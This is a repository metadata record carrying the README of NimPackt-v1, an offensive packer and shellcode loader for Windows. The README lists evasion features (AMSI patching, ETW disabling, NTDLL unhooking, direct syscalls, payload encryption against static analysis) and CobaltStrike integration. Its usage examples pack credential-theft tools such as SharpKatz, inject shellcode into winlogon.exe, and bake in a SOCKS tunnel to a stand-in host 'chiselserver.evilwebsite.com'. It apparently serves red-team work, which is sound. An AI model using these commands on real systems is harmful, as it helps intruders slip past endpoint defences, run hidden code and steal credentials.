{"id":13843808,"url":"https://github.com/chvancooten/NimPackt-v1","last_synced_at":"2025-07-11T20:30:42.705Z","repository":{"id":37361862,"uuid":"452001014","full_name":"chvancooten/NimPackt-v1","owner":"chvancooten","description":"Nim-based assembly packer and shellcode loader for opsec \u0026 profit","archived":false,"fork":false,"pushed_at":"2023-02-24T16:06:21.000Z","size":365,"stargazers_count":458,"open_issues_count":1,"forks_count":79,"subscribers_count":12,"default_branch":"main","last_synced_at":"2024-11-07T18:25:37.755Z","etag":null,"topics":["hacktoberfest"],"latest_commit_sha":null,"homepage":"","language":"Nim","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/chvancooten.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null},"funding":{"github":["chvancooten"]}},"created_at":"2022-01-25T18:45:59.000Z","updated_at":"2024-11-05T13:13:32.000Z","dependencies_parsed_at":"2024-02-08T21:11:44.162Z","dependency_job_id":null,"html_url":"https://github.com/chvancooten/NimPackt-v1","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/chvancooten%2FNimPackt-v1","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/chvancooten%2FNimPackt-v1/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/chvancooten%2FNimPackt-v1/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/chvancooten%2FNimPackt-v1/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/chvancooten","download_url":"https://codeload.github.com/chvancooten/NimPackt-v1/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225755160,"owners_count":17519215,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["hacktoberfest"],"created_at":"2024-08-04T17:02:27.726Z","updated_at":"2024-11-21T15:31:33.910Z","avatar_url":"https://github.com/chvancooten.png","language":"Nim","funding_links":["https://github.com/sponsors/chvancooten"],"categories":["Nim"],"sub_categories":[],"readme":"![NimPackt](assets/Nimpackt-Logo-Blacktext.png)\n\n# A Nim-based packer for .NET executables and raw shellcode\n\n*By **Cas van Cooten** ([@chvancooten](https://twitter.com/chvancooten))*\n\n*With special thanks to Marcello Salvati ([@byt3bl33der](https://twitter.com/byt3bl33d3r)) and Fabian Mosch ([@S3cur3Th1sSh1t](https://twitter.com/ShitSecure))*\n\n## Description\n\n**Update:** _NimPackt-v1 is among the worst code I have ever written (I was just starting out learning Nim). Because of this, I started on a full rewrite of NimPackt, dubbed 'NimPackt-NG' (currently still private). With this re-write, I decided to open-source the old branch (\"NimPackt-v1\"). As such, this branch is no longer maintained and comes without any form of warranty or support. PRs are always welcome, of course :)_\n\nNimPackt is a Nim-based packer for .NET (C#) executables and shellcode targeting Windows. It automatically wraps the payload in a Nim binary that is compiled to Native C and as such harder to detect and reverse engineer. There are two main execution methods: \n- `Execute-Assembly` re-packs a .NET executable and runs it, optionally applying evasive measures such as API unhooking, AMSI patching, or disabling ETW.\n- `Shinject` takes raw a .bin file with raw, position-independent shellcode and executes it locally or in a remote process, optionally using direct syscalls to trigger the shellcode or patching API hooks to evade EDR.\n\nCurrently, NimPackt has the following features.\n\n- Uses static syscalls to patch execute to evade EDR\n- Unhooks user-mode APIs for spawned thread by refreshing `NTDLL.dll` using [ShellyCoat](https://github.com/slaeryan/AQUARMOURY/tree/master/Shellycoat)\n- Patches Event Tracing for Windows (ETW) \n- Patches the Anti-Malware Scan Interface (AMSI)\n- AES-encrypts payload with random key to prevent static analysis or fingerprinting\n- Compiles to `exe` or `dll`\n- Supports cross-platform compilation (from both Linux and Windows)\n- Integrates with CobaltStrike for ezpz payload generation 😎\n\nA great source for C#-based binaries for offensive tooling can be found [here](https://github.com/Flangvik/SharpCollection). It is highly recommended to compile the C# binaries yourself. Even though embedded binaries are encrypted, you should obfuscate sensitive binaries (such as Mimikatz) to lower the risk of detection.\n\n## Installation\n\n\u003e If you are having issues compiling the binary with Syscalls, try downgrading your GCC to version 8.1.0 (especially on Windows). ALWAYS test generated payloads!\n\nOn **Linux**, simply install the required packages and use the Nimble package installer to install the required packages and Python libraries.\n\n```\nsudo apt install -y python3 mingw-w64 nim\npip3 install pycryptodome argparse\nnimble install winim nimcrypto\n```\n\nOn **Windows**, execute the Nim installer from [here](https://nim-lang.org/install_windows.html). Make sure to install `mingw` and set the path values correctly using the provided `finish.exe` utility. If you don't have Python3 install that, then install the required packages as follows.\n\n```\nnimble install winim nimcrypto\npip3 install pycryptodome argparse\n```\n\n### Docker\n\nThe Docker image [chvancooten/nimbuild](https://hub.docker.com/r/chvancooten/nimbuild) can be used to compile NimPackt-v1 binaries. Using Docker is easy and avoids dependency issues, as all required dependencies are pre-installed in this container.\n\nTo use it, install Docker for your OS and ensure the input shellcode is in the current folder. Then, start the compilation in a container as follows.\n\n```bash\ndocker run --rm -v `pwd`:/usr/src/np -w /usr/src/np chvancooten/nimbuild python3 NimPackt.py -e shinject -i sc.bin\n```\n\n### CobaltStrike Plugin \n\nTo install the CobaltStrike plugin, select `Cobalt Strike` -\u003e `Script Manager` from the menu bar, and select `Load`. Make sure to load the `.cna` file from it's original location, otherwise it won't be able to find the NimPackt script files!\n\n![NimPackt](assets/cna_plugin.png)\n\n\n## Usage\n\n```\nusage: NimPackt.py [-h] -e EXECUTIONMODE -i INPUTFILE [-a ARGUMENTS] [-na] [-ne] [-r]\n                   [-t INJECTTARGET] [-E] [-o OUTPUTFILE] [-nu] [-ns] [-f FILETYPE] [-s] [-32] [-S]\n                   [-d] [-v] [-V]\n\nrequired arguments:\n  -e EXECUTIONMODE, --executionmode EXECUTIONMODE\n                        Execution mode of the packer. Supports \"execute-assembly\" or \"shinject\"\n  -i INPUTFILE, --inputfile INPUTFILE\n                        C# .NET binary executable (.exe) or shellcode (.bin) to wrap\n\nexecute-assembly arguments:\n  -a ARGUMENTS, --arguments ARGUMENTS\n                        Arguments to \"bake into\" the wrapped binary, or \"PASSTHRU\" to accept run-\n                        time arguments (default)\n  -na, --nopatchamsi    Do NOT patch (disable) the Anti-Malware Scan Interface (AMSI)\n  -ne, --nodisableetw   Do NOT disable Event Tracing for Windows (ETW)\n\nshinject arguments:\n  -r, --remote          Inject shellcode into remote process (default false)\n  -t INJECTTARGET, --target INJECTTARGET\n                        Remote thread targeted for remote process injection\n  -E, --existing        Remote inject into existing process rather than a newly spawned one (default\n                        false, implies -r) (WARNING: VOLATILE)\n\nother arguments:\n  -o OUTPUTFILE, --outfile OUTPUTFILE\n                        Filename of the output file (e.g. \"LegitBinary\"). Specify WITHOUT extension\n                        or path. This property will be stored in the output binary as the original\n                        filename\n  -nu, --nounhook       Do NOT unhook user-mode API hooks in the target process by loading a fresh\n                        NTDLL.dll\n  -ns, --nosyscalls     Do NOT use direct syscalls (Windows generation 7-10) instead of high-level\n                        APIs to evade EDR\n  -f FILETYPE, --filetype FILETYPE\n                        Filetype to compile (\"exe\" or \"dll\", default: \"exe\")\n  -s, --sleep           Sleep for approx. 30 seconds by calculating primes\n  -32, --32bit          Compile in 32-bit mode (untested)\n  -S, --showConsole     Show a console window with the app's output when running\n  -d, --debug           Enable debug mode (retains .nim source file in output folder)\n  -v, --verbose         Print debug messages of the wrapped binary at runtime\n  -V, --version         show program's version number and exit\n```\n\n**Examples:**\n\n```bash\n# Pack SharpKatz to accept arguments at runtime, patching NTDLL hooks, AMSI, and ETW while printing verbose messages to a visible console at runtime\npython3 ./NimPackt.py -e execute-assembly -i bins/SharpKatz-x64.exe -S -v\n\n# Pack Seatbelt as a DLL file with baked-in arguments (note: write to outfile because stdout is not available for DLLs)\npython3 ./NimPackt.py -f dll -e execute-assembly -i Seatbelt.exe -a \"-group=all -outputfile=c:\\users\\public\\downloads\\sb.txt\"\n\n# Pack SharpChisel with a built-in ChiselChief connection string, do not unhook, patch AMSI, or disable ETW, hide the application window at runtime\npython3 NimPackt.py -nu -na -ne -e execute-assembly -i bins/SharpChisel.exe -a 'client --keepalive 25s --max-retry-interval 25s https://chiselserver.evilwebsite.com R:10073:socks'\n\n# Pack raw shellcode to DLL file that executes in the local thread through direct syscalls, unhooking NTDLL as well\n# Shellcode generated with 'msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o /tmp/calc.bin'\npython3 NimPackt.py -i calc.bin -e shinject -f dll\n\n# Pack raw shellcode to execute in a newly spawned Calculator thread in an invisible window\npython3 NimPackt.py -i calc.bin -e shinject -t \"calc.exe\"\n\n# Pack raw shellcode to execute in the existing Winlogon process (first PID with name 'winlogon.exe'), do not use direct syscalls or unhook NTDLL\npython3 NimPackt.py -i calc.bin -e shinject -r -E -t \"winlogon.exe\" -nu -ns\n```\n\nBinaries are stored in the `output` subfolder of your installation directory. Generated `dll` files can be executed as follows (entry point can be changed in the Nim template):\n\n```powershell\nrundll32 exampleShinjectNimPackt.dll,IconSrv\n```","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fchvancooten%2FNimPackt-v1","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fchvancooten%2FNimPackt-v1","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fchvancooten%2FNimPackt-v1/lists"}